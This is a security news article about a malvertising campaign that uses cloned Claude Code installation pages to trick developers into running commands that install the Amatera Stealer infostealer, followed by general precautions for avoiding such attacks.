Cybercriminals have launched a new campaign using InstallFix attacks to distribute information-stealing malware through fake Claude Code installation guides. The operation targets developers searching for instructions to install Anthropic’s Claude Code CLI. Instead of legitimate documentation, victims land on convincing clone pages that contain malicious terminal commands.
Security researchers discovered that these pages replicate official documentation almost perfectly. However, the installation instructions have been replaced with commands that silently download and execute infostealer malware. The campaign highlights how attackers increasingly exploit normal developer workflows to compromise systems.
Fake Documentation Pages Trick Developers
Researchers found that attackers created pixel-perfect clones of Claude Code documentation pages. The fake sites reproduce the layout, design, and navigation menus of the real documentation portal. At first glance, they appear completely legitimate.
The attack relies on search visibility. Cybercriminals purchase sponsored advertisements that appear at the top of search results for queries related to Claude Code installation. Users who click these ads are redirected to the fake documentation pages.
Once on the page, victims encounter installation instructions that look identical to legitimate commands. Developers often copy commands directly from documentation without inspecting them closely. The attackers exploit this behavior by embedding malicious instructions inside the copied command.
When the command runs in a terminal, it downloads malware from attacker-controlled servers and executes it on the system.
Malicious Commands Deliver Infostealer Malware
The campaign distributes a malware family known as Amatera Stealer, an information-stealing threat designed to harvest sensitive data from infected systems. Once installed, the malware begins collecting information from browsers and local applications.
The stolen data may include:
- Stored browser credentials
- Session cookies and authentication tokens
- Cryptocurrency wallet information
- System configuration details
Researchers believe Amatera Stealer evolved from earlier infostealer projects and is distributed through a malware-as-a-service model. This model allows multiple threat actors to deploy the malware in their own campaigns.
The attack also adapts to different operating systems. On macOS systems, malicious commands often use encoded instructions that download and execute binary payloads. On Windows machines, attackers rely on built-in tools such as mshta.exe to retrieve and run the malware.
InstallFix Exploits Normal Developer Behavior
InstallFix attacks represent a variation of the ClickFix technique that security researchers have tracked in recent campaigns. Traditional ClickFix attacks rely on fake error messages or verification prompts to convince victims to execute commands.
InstallFix campaigns take a different approach. Instead of presenting an error message, attackers disguise malicious commands as legitimate installation instructions.
Developers frequently install tools using terminal commands retrieved from documentation pages. Commands such as curl scripts that pipe directly into shell execution are common in developer workflows. When the command originates from a malicious domain, it gives attackers the ability to execute arbitrary code on the victim’s system immediately.
This method requires no phishing email or direct targeting. Simply searching for installation instructions can expose users to the attack.
Malvertising Expands the Reach of the Campaign
Malvertising plays a major role in distributing the fake documentation pages. Sponsored search results often appear above legitimate resources, which increases the likelihood that users will click them first.
The attackers also host their fake pages on well-known infrastructure platforms. Researchers observed sites deployed through services such as content delivery networks and website hosting platforms. These environments can make malicious pages appear more credible and can delay detection.
The combination of search ads, convincing documentation clones, and trusted hosting infrastructure allows attackers to scale the campaign quickly.
Security Measures to Reduce Risk
Developers and system administrators can reduce the risk of InstallFix attacks by following several precautions:
- Avoid clicking sponsored search results for developer tools.
- Access documentation through official project websites.
- Bookmark trusted installation pages.
- Carefully inspect commands before running them in a terminal.
Security teams should also monitor developer environments for suspicious command execution and unexpected network downloads.
Final Thoughts
InstallFix attacks demonstrate how cybercriminals continue adapting social engineering techniques to modern development workflows. Instead of traditional phishing messages, attackers now imitate trusted documentation to trick users into executing malicious commands.
The campaign targeting Claude Code installation guides shows how convincing these attacks can become when they replicate legitimate resources. As developers increasingly rely on online documentation and command-line installation scripts, verifying sources before executing commands becomes critical for maintaining security.
